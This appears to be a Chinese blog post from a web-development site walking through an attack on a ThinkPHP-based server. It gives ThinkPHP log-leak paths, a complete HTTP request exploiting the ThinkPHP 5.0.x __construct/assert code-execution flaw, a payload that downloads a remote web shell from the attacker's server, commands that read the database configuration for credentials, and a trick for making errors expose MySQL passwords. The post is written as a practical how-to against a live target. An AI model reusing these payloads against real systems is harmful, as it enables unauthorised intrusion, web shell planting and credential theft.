业内知识
发布需求
您的位置: 翼速应用 > 业内知识 > PHP框架 > 正文
0 0

渗透实战ThinkPHP框架分享

阅读19

信息收集

找到一个网站 http://x.x.x.x/ 下面开始对他进行渗透

首先使用nmap对受害服务器开放的端口扫描探测端口

可以看到开放的端口如下

QQ截图20220124152740.jpg

端口就是应用程序在计算机通信中的唯一识别id,通过端口我们就能知道受害服务器开放了什么服务

如3306是mysql并开启了外联,接下来我们对端口访问看看具体开放了什么服务

8080开放了phpmyadmin一款php连接mysql工具我们可以利用他爆破mysql密码

1642752871251202.png

8082是一个贷款首页

111.jpg

随便输入一个不存在的路由然后查看错误信息如http://x.x.x.x/gfvhf

QQ截图20220124152948.jpg

成功报错:thinkphp框架的版本是5.1.7(这个版本有注入漏洞)

QQ截图20220124153013.jpg

8092是一个后台,因为部署不规范存在thinkphp日志泄露,路径 http://x.x.x.x:8092/runtime/log/202112/19.log 可以到里面查看到管理员登录过的账号密码。

这里说一下黑产使用thinkphp框架因为运维半吊子很有可能有thinkphp日志泄露

tp5-6 payload: 域名/runtime/log/202112/19.log (后面的202112/19.log是根据当前日期变化的)

tp3 payload: 域名 /Application/Runtime/Logs/Home/21_12_19.log (后面的21_12_19.log是根据当前日期变化的)


QQ截图20220124153046.jpg

8083端口使用的thinkphp版本是5.0.15,5.0.15版本的利用条件低挑软柿子捏就这个吧

QQ截图20220124153113.jpg

信息收集完毕精准打击

打开burp,然后使用抓包,然后将数据包转发到burp的Repeater模块下,将抓包内容替换成如下内容

漏洞原理就不做详细讲解了,没个php架构层是听不懂的。简单描述一下就是一个变量覆盖造成代码执行

下面数据包内容是触发漏洞让服务器执行phpinfo()

POST /index.php?s=captcha&echod=phpinfo() HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: pmaCookieVer=5; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=iar4j14536rat57j1d5018qjtt8vj69g
Content-Type:application/x-www-form-urlencoded
Content-Length: 77
_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=echod

执行成功,可以看到php的一些详细信息

QQ截图20220124153226.jpg

下面开始写入shell将请求头替换成:

POST /index.php s=captcha&echod=copy('http://x.x.x.x/2.txt','t2.php') HTTP/1.1

意思是将我服务器上远程的shell文件http://x.x.x.x/2.txt下载,写入到当前web目录下的t2.php

但我访问t2.php,出现404猜测应该是当前目录没有写权限

于是尝试给写权限:

POST /index.php?s=captcha&echod=chmod('./',0777) HTTP/1.1

发现还是写不了shell,php权限很低。

将chmod('./',0777) 替换成readfile('../application/database.php')读取数据库配置文件。发现成功获取到mysql账号密码。

QQ截图20220124153342.jpg

使用我们之前发现的phpmyadmin服务登录然后mysql开启外联

使用mysql管理工具连接,发现一堆数据库。并且mysql直接是root权限,可以对服务器进行提权(内网横向渗透)等。反正外网以经开了一个口子,这里我就不深入了。

QQ截图20220124153402.jpg

总结

总结一下我自己摸索出来的一些思路:thinkphp在开启debug模式下如果服务器开启了数据库外联,可以通过爆破mysql服务发送大量请求(让mysql堵塞),使thinkphp连接mysql超时就会报连接异常错误,并将mysql账号密码输出到页面上。


举报

我来说两句

0 条评论

推荐阅读

  • 响应式布局CSS媒体查询设备像素比介绍

    构建响应式网站布局最常见的是流体网格,灵活调整大小的站点布局技术,确保用户在使用的幕上获得完整的体验。响应式设计如何展示富媒体图像,可以通过以下几种方法。

    admin

  • 提升网站的性能快速加载的实用技巧

    网站速度很重要,快速加载的网站会带来更好的用户体验、更高的转化率、更多的参与度,而且在搜索引擎排名中也扮演重要角色,做SEO,网站硬件是起跑线,如果输在了起跑线,又怎么跟同行竞争。有许多方法可提升网站的性能,有一些技巧可以避免踩坑。

    admin

  • 织梦CMS TAG页找不到标签和实现彩色标签解决方法

    织梦cms是我们常见的网站程序系统的一款,在TAG标签中常常遇到的问题也很多。当我们点击 tags.php 页的某个标签的时候,有时会提示:“系统无此标签,可 能已经移除!” 但是我们检查程序后台,以及前台显示页面。这个标签确实存在,如果解决这个问题那?

    admin

  • HTML关于fieldset标签主要的作用

    在前端开发html页面中常用的标签很多,今天为大家带来的是关于HTML中fieldset标签主要的作用说明,根据技术分析HTML

    admin
更多文章

精选专题

热点推荐
最新更新